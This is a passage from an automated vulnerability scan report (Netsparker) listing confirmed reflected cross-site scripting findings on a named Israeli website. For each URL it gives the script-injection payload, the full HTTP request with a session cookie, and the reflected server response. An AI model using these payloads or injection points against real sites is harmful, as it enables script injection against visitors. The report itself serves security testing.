Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:19 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/upload_image.asp'"--></style></script><script>netsparker(0x0003AF)</script><BR>script><BR>style><<script>netsparker(0x0003AF)<.asp?id=script>
50 / 146
3.63. /vod/vod.asp CONFIRMED
http://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
Parameter Type Value
id GET '"--></style></script>
<script>alert(0x00015D)</script>
Request
GET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

';
}
</script>
<tr><td align="center">
<video width="594" height="350" controls>
<!--<source src="http://80.179.48.178/shiloftp/nekoda/video/slaam/'"--></style></script><script>netsparker(0x00015D)</script>_fix.mp4" type="video/mp4">-->
<source src="http://lavishilo.org/temp/54.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
</td></tr><tr>
<Td dir="rtl"

3.64. /jAccordion/jquery.easing.1.3.min.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000F5)</script>
Request
GET /jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000F5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 195
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/jquery.easing.1.3.min.js'"--></style></script><script>netsparker(0x0000F5)</script><BR>script><BR>style><<script>netsparker(0x0000F5)<.asp?
id=script>
51 / 146
3.65. /page/odot/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004E2)</script>
Request
GET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/page/odot/'"--></style></script><script>netsparker(0x0004E2)</script><BR>script><BR>style><<script>netsparker(0x0004E2)<.asp?id=script>
3.66. /about/search/ CONFIRMED
http://www.shalomlaam.co.il/about/search/?'"--></style></script><script>alert(0x000534)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x000534)</script>
Request
GET /about/search/?'"--></style></script><script>netsparker(0x000534)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/?'"--></style></script><script>netsparker(0x000534)</script><BR>script><BR>style><<script>netsparker(0x000534)<.asp?id=script>
3.67. /reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001D5)</script>
52 / 146
Request
GET /reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D5)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:03 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x0001D5)</script><BR>script><BR>style><<script>netsparker(0x0001D5)<.asp?id=script>
3.68. /about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/s..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00013C)</script>
Request
GET /about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013C)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 166
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/'"--></style></script><script>netsparker(0x00013C)</script><BR>script><BR>style><<script>netsparker(0x00013C)<.asp?id=script>
3.69. /contact/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004A9)</script>
Request
GET /contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004A9)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
53 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 175
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/'"--></style></script><script>netsparker(0x0004A9)</script><BR>script><BR>style><<script>netsparker(0x0004A9)<.asp?id=script>
3.70. /uploadimages/2011_8_22_13_2_45.JPG'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cs..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000573)</script>
Request
GET /uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000573)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 194
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/uploadimages/2011_8_22_13_2_45.JPG'"--></style></script><script>netsparker(0x000573)</script><BR>script><BR>style><<script>netsparker(0x000573)<.asp?
id=script>
3.71. /snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C..
Parameters
Parameter Type Value
id GET 61
URI-BASED Full URL '"--></style></script>
<script>alert(0x000234)</script>
Request
GET /snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000234)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/snif.asp'"--></style></script><script>netsparker(0x000234)</script><BR>script><BR>style><<script>netsparker(0x000234)<.asp?id=script>
54 / 146
3.72. /maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/maillingUpdate.asp?'"--></style></script><script>alert(0x000218)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x000218)</script>
Request
GET /maillingUpdate.asp?'"--></style></script><script>netsparker(0x000218)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:36 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000218)</script><BR>script><BR>style><<script>netsparker(0x000218)<.asp?id=script>
3.73. /js/func_site.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000DC)</script>
Request
GET /js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DC)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 175
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/func_site.js'"--></style></script><script>netsparker(0x0000DC)</script><BR>script><BR>style><<script>netsparker(0x0000DC)<.asp?id=script>
3.74. /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00010D)</script>
55 / 146
Request
GET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/'"--></style></script><script>netsparker(0x00010D)</script><BR>script><BR>style><<script>netsparker(0x00010D)<.asp?id=script>
3.75. /tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001BB)</script>
Request
GET /tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BB)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/tags/'"--></style></script><script>netsparker(0x0001BB)</script><BR>script><BR>style><<script>netsparker(0x0001BB)<.asp?id=script>
3.76. /site/bmidrash/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Parameter Type Value
id GET 128
alon GET 460
URI-BASED Full URL '"--></style></script>
<script>alert(0x00037E)</script>
Request
GET /site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00037E)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
56 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:59:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 184
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"--></style></script><script>netsparker(0x00037E)</script><BR>script><BR>style><<script>netsparker(0x00037E)<.asp?id=script>
3.77. /UploadImages/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000109)</script>
Request
GET /UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000109)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/UploadImages/'"--></style></script><script>netsparker(0x000109)</script><BR>script><BR>style><<script>netsparker(0x000109)<.asp?id=script>
3.78. /yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001AF)</script>
Request
GET /yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AF)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/yeshiva/'"--></style></script><script>netsparker(0x0001AF)</script><BR>script><BR>style><<script>netsparker(0x0001AF)<.asp?id=script>
57 / 146
3.79. /alon/list.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000156)</script>
Request
GET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/list.asp'"--></style></script><script>netsparker(0x000156)</script><BR>script><BR>style><<script>netsparker(0x000156)<.asp?id=script>
3.80. /site/uploadimages/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002B4)</script>
Request
GET /site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B4)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:30 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/uploadimages/'"--></style></script><script>netsparker(0x0002B4)</script><BR>script><BR>style><<script>netsparker(0x0002B4)<.asp?id=script>
58 / 146
3.81. /about/reg/ CONFIRMED
http://www.shalomlaam.co.il/about/reg/?'"--></style></script><script>alert(0x0004FE)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x0004FE)</script>
Request
GET /about/reg/?'"--></style></script><script>netsparker(0x0004FE)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/?'"--></style></script><script>netsparker(0x0004FE)</script><BR>script><BR>style><<script>netsparker(0x0004FE)<.asp?id=script>
3.82. /about/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004FA)</script>
Request
